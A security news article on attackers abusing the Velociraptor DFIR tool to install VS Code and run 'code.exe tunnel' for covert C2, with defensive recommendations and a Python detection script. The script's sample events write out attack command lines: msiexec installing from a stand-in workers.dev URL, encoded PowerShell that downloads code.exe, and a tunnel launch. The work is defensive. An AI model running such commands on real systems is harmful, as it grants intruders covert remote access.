Abstract illustration of a Trojan horse on a computer screen with a security shield, representing abuse of forensic tools for covert attacks.

Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling

Overview

Cybersecurity researchers have warned that unknown threat actors abused the open source digital forensics and incident response (DFIR) tool Velociraptor to establish a covert command‑and‑control (C2) tunnel through Visual Studio Code. The attack, detailed by Sophos and reported by The Hacker News, shows how an incident‑response agent can be repurposed so that the intruder needs little or no custom malware while still obtaining persistent remote access. It is a living‑off‑the‑land technique, part of a broader trend in which adversaries weaponize legitimate software to avoid detection.

Attack chain

According to Sophos’s analysis, the threat actor used the Windows Installer utility msiexec, which accepts a URL as its package argument, to download and install an MSI hosted on a Cloudflare Workers domain. The installer deployed Velociraptor on the victim’s machine and configured it to communicate with a second Cloudflare domain. Once Velociraptor was running, the attackers executed a Base64‑encoded PowerShell command to fetch Visual Studio Code (code.exe) from the same staging server and launched it with the tunnel option (code.exe tunnel), which gave them remote access and code execution over a channel that looks like ordinary developer traffic. The activity triggered a Taegis alert that eventually led to the attack’s discovery.

Sophos noted that the attackers reused msiexec to download additional payloads from the Cloudflare environment, demonstrating how a single built‑in Windows utility can be abused repeatedly. The Hacker News report paired the Sophos findings with a separate campaign in which attackers impersonated IT support staff through Microsoft Teams direct messages to lure users into installing remote‑access tools such as AnyDesk, DWAgent or Quick Assist, then used those footholds to deploy malware. Both operations rely on the same principle: legitimate software and social engineering in place of custom tooling.

Impact and recommended actions

While the use of Velociraptor for C2 tunneling is unusual, the technique fits a broader pattern of adversaries abusing legitimate tools. By hiding behind trusted software, attackers reduce the need for bespoke malware and evade endpoint detections that key on known‑malicious binaries. Sophos warned that organisations should treat any unauthorized deployment of Velociraptor as a pre‑ransomware indicator and respond accordingly: the tool gives an intruder the same remote collection and execution capability it gives an incident responder.

Recommended actions:

  1. Monitor for unexpected tools and behaviour: Implement endpoint detection and response (EDR) and alert on Velociraptor binaries, services or client configurations on hosts outside the incident‑response team’s own allowlist, on msiexec installing packages directly from a URL, and on encoded PowerShell that downloads files.
  2. Harden remote communication channels: Restrict the use of tunneling features in development tools (e.g., Visual Studio Code launched with the tunnel option), alert on code.exe running from user‑writable locations, and monitor for their misuse.
  3. Secure collaboration platforms: Train users to be cautious of unsolicited Microsoft Teams or Slack messages and to verify IT support requests through a known channel. Block installation of remote‑access tools such as AnyDesk or DWAgent without administrative approval, ideally through application control.
  4. Maintain offline backups: Ensure regular, tested backups to limit the impact if attackers pivot to ransomware deployment, which often follows such intrusions.
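As an added example (not code from the Sophos report, The Hacker News, or the Velociraptor project), the following Python script turns the attack chain described above and recommendations 1 and 2 into detection logic and runs it over a handful of constructed process‑creation events. It flags msiexec installing from a URL, Base64/UTF‑16LE encoded PowerShell whose decoded body downloads a file, code.exe started in tunnel mode, and Velociraptor on a host that is not on the IR team’s allowlist. The hostnames, file paths, the workers.dev domain and the allowlist itself are assumptions invented for the example.

```python
import base64
import re
from dataclasses import dataclass

# Hosts where the IR team legitimately runs Velociraptor (assumption for this example).
APPROVED_VELOCIRAPTOR_HOSTS = {"IR-WS-01"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
# -e, -ec, -enc, -EncodedCommand (any prefix PowerShell accepts) but not -ExecutionPolicy,
# followed by a base64 blob of at least 16 characters.
ENC_RE = re.compile(r"(?:^|\s)-e(?!x)[a-z]*\s+[\"']?([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b",
    re.I,
)
TUNNEL_RE = re.compile(r"\btunnel\b", re.I)


@dataclass
class Finding:
    rule: str
    host: str
    cmdline: str
    detail: str


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument, or None.

    PowerShell expects base64 over UTF-16LE text, so an argument that merely looks
    like base64 (odd byte count, invalid characters) fails to decode and is ignored.
    """
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev: dict) -> list:
    """Apply the four rules to one process-creation event (host, image, cmdline)."""
    host, image, cmdline = ev["host"], ev["image"], ev["cmdline"]
    exe = image.rsplit("\\", 1)[-1].lower()
    findings = []

    # 1. msiexec fetching and installing a package straight from a URL.
    if exe == "msiexec.exe":
        url = URL_RE.search(cmdline)
        if url:
            findings.append(Finding("msiexec_remote_install", host, cmdline, url.group(0)))

    # 2. Encoded PowerShell whose decoded body downloads something.
    if exe in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmdline)
        if decoded and DOWNLOAD_RE.search(decoded):
            findings.append(Finding("encoded_powershell_download", host, cmdline, decoded[:100]))

    # 3. Visual Studio Code started in tunnel mode.
    if exe == "code.exe" and TUNNEL_RE.search(cmdline):
        findings.append(Finding("vscode_tunnel", host, cmdline, "code.exe tunnel"))

    # 4. Velociraptor on a host the IR team does not own.
    if "velociraptor" in exe or "velociraptor" in cmdline.lower():
        if host not in APPROVED_VELOCIRAPTOR_HOSTS:
            findings.append(Finding("unapproved_velociraptor", host, cmdline, exe))

    return findings


def analyze(events) -> list:
    return [f for ev in events for f in analyze_event(ev)]


# Constructed sample events (Sysmon EID 1 / Security 4688 style); hostnames, paths
# and the workers.dev domain are invented for this example.
_PS_PLAINTEXT = (
    "Invoke-WebRequest -Uri https://staging.example.workers.dev/code.exe "
    "-OutFile C:\\ProgramData\\code.exe"
)
_PS_ENCODED = base64.b64encode(_PS_PLAINTEXT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"host": "WS-042", "image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": "msiexec.exe /i https://staging.example.workers.dev/agent.msi /qn"},
    {"host": "WS-042", "image": "C:\\Program Files\\Velociraptor\\Velociraptor.exe",
     "cmdline": "\"C:\\Program Files\\Velociraptor\\Velociraptor.exe\" --config client.config.yaml service install"},
    {"host": "WS-042", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": f"powershell.exe -NoProfile -W Hidden -enc {_PS_ENCODED}"},
    {"host": "WS-042", "image": "C:\\ProgramData\\code.exe",
     "cmdline": "C:\\ProgramData\\code.exe tunnel --accept-server-license-terms --name ws042"},
    # Benign: the IR workstation running Velociraptor, a scripted inventory run, a local MSI.
    {"host": "IR-WS-01", "image": "C:\\Program Files\\Velociraptor\\Velociraptor.exe",
     "cmdline": "Velociraptor.exe gui"},
    {"host": "WS-042", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Unrestricted -File C:\\scripts\\inventory.ps1"},
    {"host": "WS-042", "image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\Temp\\app.msi /qn"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

Run against the constructed events, the script reports the four stages on WS‑042 and stays silent on the IR workstation, the -ExecutionPolicy script run, and the local MSI install. The decoder is the part worth keeping: matching on the -enc switch alone produces noise, whereas decoding the UTF‑16LE payload and inspecting it for download cmdlets is what separates this chain from routine scripted administration.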

Conclusion

The Velociraptor/Visual Studio Code attack highlights the challenge defenders face when legitimate tools are turned against them. Using only built‑in Windows utilities and open‑source software, the attackers established a covert C2 tunnel without deploying obvious malware, and the Teams‑based IT‑support impersonation reported alongside it shows how little custom tooling an intrusion needs from first contact onward. Security teams must expand their monitoring to include unexpected uses of trusted tools, enforce stricter controls on remote‑access utilities, and foster a security culture that questions unusual IT support interactions.

Sources: The Hacker News – Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling, Sophos Counter Threat Unit – Velociraptor incident response tool abused for remote access